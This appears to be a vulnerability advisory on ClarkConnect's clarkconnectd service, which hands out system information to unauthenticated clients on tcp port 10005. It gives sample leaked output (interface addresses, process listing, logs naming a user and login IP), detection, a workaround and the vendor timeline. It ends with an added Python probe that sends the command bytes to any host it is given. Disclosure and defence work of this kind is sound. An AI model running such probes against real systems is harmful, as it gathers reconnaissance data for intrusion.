Attached document explains all. This is also available from http://kokanins.homepage.dk
I. BACKGROUND

According to the vendor: "ClarkConnect transforms standard PC hardware into a dedicated broadband gateway and easy-to-use server. The award-winning Linux-based server solution includes firewall and security tools, along with file, print, web, e-mail, proxy, and VPN servers."

ClarkConnect is available from http://www.clarkconnect.org/

II. DESCRIPTION

A service named clarkconnectd can be 'persuaded' into giving up various information about the system to anyone who can connect to it.

III. ANALYSIS

clarkconnectd listens on tcp port 10005. Sending it one of the characters below, followed by several line feeds, makes it return system information; no authentication is involved. Characters found to produce output are:

"A" - date and time on server
"F" - some unknown number
"M" - various ifconfig output [1]
"P" - process listing [2]
"Y" - snort log file [3]
"b" - /var/log/messages

The samples in [1]-[3] show what a client gets for free: the gateway's interface addresses (including its external address), which services are running and as which users (sshd, smbd, snort, webconfig, interactive shells), and log lines naming a user and the external address he logs in from over ssh. The process listing [2] also shows how the daemon produces its answers: for a "P" request it forks sh -c /bin/ps auxw | sed "s/[ ][ ]*/ /g" (the telnet localhost 10005 process in the listing is the session that triggered it).

IV. DETECTION

The service is known to ship with ClarkConnect linux 1.2.

$ md5sum /usr/sbin/clarkconnectd
2188b6afe10bb213e9dcf93b5c43ef1d  /usr/sbin/clarkconnectd

A clarkconnectd process in the process list, or a listener on tcp port 10005, is also a sign that the service is present.

V. WORKAROUND

rm /usr/sbin/clarkconnectd

Removing the binary does not stop a daemon that is already running, so kill the clarkconnectd processes as well (or reboot). If the daemon is needed for the backwards compatibility the vendor mentions below, block tcp port 10005 from all but trusted hosts at the firewall instead of removing it.

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

23/2-03 support@clarkconnect.com notified
23/2-03 autoresponse received, [ticket #3822]
24/3-03 response:

begin response
This is an old and deprecated daemon that is used for backwards compatibility. We'll have a fix to limit the amount of information that is sent out. Believe it or not, it is supposed to give this information out on the LAN/trusted network. You are right though... it is too much information.
_____________
Peter Baldwin
Point Clark Networks
end response

IX. CREDIT

Knud Erik Højgaard

[1]
eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0 none 00:00:00:00:00:00 0.0.0.0 0.0.0.0 10.0.0.1-eth0 212.242.40.3 0.0.0.0 -- -- -- --:--:-- -- -- -- --:--:--

[2]
root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init
root 2 0.0 0.0 0 0 ? SW Jan28 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Jan28 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN Jan28 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Jan28 0:44 [kswapd]
root 6 0.0 0.0 0 0 ? SW Jan28 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Jan28 0:02 [kupdated]
root 8 0.0 0.0 0 0 ? SW Jan28 0:00 [mdrecoveryd]
root 16 0.0 0.0 0 0 ? SW Jan28 0:34 [kjournald]
root 135 0.0 0.0 0 0 ? SW Jan28 0:00 [kjournald]
root 481 0.0 0.0 1364 164 ? S Jan28 0:33 syslogd -m 0
root 486 0.0 0.0 1912 168 ? S Jan28 0:21 klogd -c 1 -2
root 560 0.0 0.1 2568 312 ? S Jan28 0:04 /usr/sbin/sshd
root 609 0.0 0.0 1472 120 ? S Jan28 0:20 crond
root 639 0.0 0.0 4816 4 ? S Jan28 0:00 smbd -D
root 644 0.0 0.2 3784 384 ? S Jan28 0:42 nmbd -D
root 706 1.7 10.8 51748 20760 ? S Jan28 21:22 snort -D
root 766 0.0 0.0 5248 60 ? S Jan28 0:25 webconfig -f /var/webconfig/conf/httpd.conf
root 771 0.0 0.0 1280 4 tty2 S Jan28 0:00 /sbin/mingetty tty2
root 772 0.0 0.0 1280 4 tty3 S Jan28 0:00 /sbin/mingetty tty3
root 773 0.0 0.0 1280 4 tty4 S Jan28 0:00 /sbin/mingetty tty4
root 774 0.0 0.0 1280 4 tty5 S Jan28 0:00 /sbin/mingetty tty5
root 775 0.0 0.0 1280 4 tty6 S Jan28 0:00 /sbin/mingetty tty6
root 2972 0.0 0.0 2224 4 ? S Jan28 0:00 login -- root
root 12050 0.0 0.3 2392 700 tty1 S Jan28 0:02 -bash
502 5338 0.0 0.1 5392 380 ? S Jan28 0:16 webconfig -f /var/webconfig/conf/httpd.conf
502 5403 0.0 0.1 5288 244 ? S Jan28 0:01 webconfig -f /var/webconfig/conf/httpd.conf
suva 5567 0.0 0.4 2416 932 ? S Jan28 0:00 /usr/local/suva/bin/suvad
root 7667 0.0 2.0 5388 3984 ? S Jan28 0:12 netwatchd
root 9897 0.0 0.2 1468 420 ? S 00:07 0:07 clarkconnectd
root 31066 0.5 0.8 3516 1712 ? S 13:06 0:01 /usr/sbin/sshd
kain 31067 0.1 0.6 2380 1280 pts/0 S 13:06 0:00 -bash
root 31127 0.0 0.5 2264 1008 pts/0 S 13:06 0:00 su - root
root 31128 0.2 0.6 2396 1304 pts/0 S 13:06 0:00 -bash
root 31250 0.1 0.2 1484 448 ? S 13:09 0:00 clarkconnectd
root 31251 1.0 0.4 2056 844 pts/0 S 13:09 0:00 telnet localhost 10005
root 31252 0.0 0.2 1484 428 ? S 13:09 0:00 clarkconnectd
root 31257 0.0 0.5 2168 968 ? S 13:09 0:00 sh -c /bin/ps auxw | sed "s/[ ][ ]*/ /g"
root 31258 0.0 0.3 2532 680 ? R 13:09 0:00 /bin/ps auxw
root 31259 0.0 0.1 1336 372 ? S 13:09 0:00 sed s/[ ][ ]*/ /g

[3]
Jan-28-2000 01:35:40 last message repeated 2 times
Jan-28-2000 01:37:40 last message repeated 2 times
Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:40:04 sshd Accepted password for kain from 217.157.2.38 port 4624 ssh2
Jan-28-2000 01:40:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:41:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:43:14 last message repeated 2 times
Jan-28-2000 01:45:14 last message repeated 2 times
Jan-28-2000 01:47:14 last message repeated 2 times
Jan-28-2000 01:49:14 last message repeated 2 times
Jan-28-2000 01:50:41 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:52:41 last message repeated 2 times
Jan-28-2000 01:54:41 last message repeated 2 times
Jan-28-2000 01:56:41 last message repeated 2 times
Jan-28-2000 01:57:42 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:59:42 last message repeated 2 times
Jan-28-2000 02:01:08 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 11:16:36 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 11:18:36 last message repeated 2 times
Jan-29-2000 11:20:36 last message repeated 2 times
Jan-29-2000 11:22:37 last message repeated 2 times
Jan-29-2000 11:24:37 last message repeated 2 times
Jan-29-2000 11:26:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:01:09 last message repeated 2 times
Jan-29-2000 12:02:09 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:04:10 last message repeated 2 times
Jan-29-2000 12:06:10 last message repeated 2 times
Jan-29-2000 12:07:23 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:09:23 last message repeated 2 times
Jan-29-2000 12:11:23 last message repeated 2 times
Jan-29-2000 12:13:23 last message repeated 2 times
Jan-29-2000 12:14:24 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:16:24 last message repeated 2 times
Jan-29-2000 12:17:37 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:19:37 last message repeated 2 times
Jan-29-2000 12:59:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 12:59:25 sshd fatal: Timeout before authentication for 217.157.2.38.
Jan-29-2000 13:00:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:01:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:03:10 last message repeated 2 times
Jan-29-2000 13:05:10 last message repeated 2 times
Jan-29-2000 13:06:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:06:24 sshd Accepted password for kain from 217.157.2.38 port 1526 ssh2
Jan-29-2000 13:07:10 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:08:15 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:10:15 last message repeated 2 times
Jan-29-2000 13:12:15 last message repeated 2 times
Jan-29-2000 13:13:16 snort [1:469:1] ICMP PING NMAP [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-29-2000 13:15:16 last message repeated 2 times
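The exchange described in section III, as an added example that is not part of the original advisory and not ClarkConnect's own code: a small Python probe that connects to tcp port 10005, sends each documented command byte followed by line feeds, and collects whatever the daemon sends back before closing. Since the real daemon is not available here, the block also contains a constructed stand-in server whose canned replies are invented for the demo (the function names, the fake replies and the use of an ephemeral loopback port are all assumptions, not observed behaviour); give the script a host argument to aim the probe at a real listener instead.

```python
import socket
import sys
import threading

PORT = 10005  # tcp port clarkconnectd listens on (section III)

# Command bytes documented in section III and what each one returns.
COMMANDS = {
    b"A": "date and time on server",
    b"F": "some unknown number",
    b"M": "ifconfig output",
    b"P": "process listing",
    b"Y": "snort log file",
    b"b": "/var/log/messages",
}


def probe(host, port, command, newlines=3, timeout=2.0):
    """Send one command byte followed by several line feeds; return the raw reply.

    The daemon answers and then closes, so read until EOF (or give up on timeout).
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(command + b"\n" * newlines)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # daemon kept the socket open; keep what arrived so far
    return b"".join(chunks)


def probe_all(host, port, commands=COMMANDS):
    """Return {command: reply} for every documented command that produced output."""
    results = {}
    for cmd in commands:
        reply = probe(host, port, cmd)
        if reply.strip():
            results[cmd] = reply
    return results


# Constructed stand-in for clarkconnectd so the probe can be run offline. These
# replies are invented for the demo (same shape as the advisory's samples, not
# captured from a real system).
FAKE_REPLIES = {
    b"A": b"Sun Feb 23 12:00:00 CET 2003\n",
    b"F": b"42\n",
    b"M": b"eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0\n",
    b"P": b"root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init\n",
    b"Y": b"Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP\n",
    b"b": b"Jan 28 01:40:04 gw sshd: Accepted password for kain\n",
}


def start_fake_daemon(replies=FAKE_REPLIES):
    """Listen on 127.0.0.1:<ephemeral>; return (port, stop_callable).

    Modelled on the observed behaviour: the first byte of the request selects the
    report, an unknown byte gets nothing, and the connection is closed afterwards.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(1.0)
                try:
                    request = conn.recv(64)
                except socket.timeout:
                    request = b""
                conn.sendall(replies.get(request[:1], b""))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop.set


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # python probe.py <gateway-ip>
        host, port, stop = sys.argv[1], PORT, None
    else:                                      # no target given: use the stand-in
        port, stop = start_fake_daemon()
        host = "127.0.0.1"
    for cmd, reply in probe_all(host, port).items():
        first = reply.splitlines()[0].decode("latin-1")
        print(f"{cmd.decode()!r} -> {COMMANDS[cmd]}: {len(reply)} bytes, e.g. {first!r}")
    if stop:
        stop()
```

The probe opens a fresh connection per command because the daemon closes the socket after answering, which is also why reading to EOF rather than for a fixed length is the right way to collect a reply of unknown size such as a process listing or a log file.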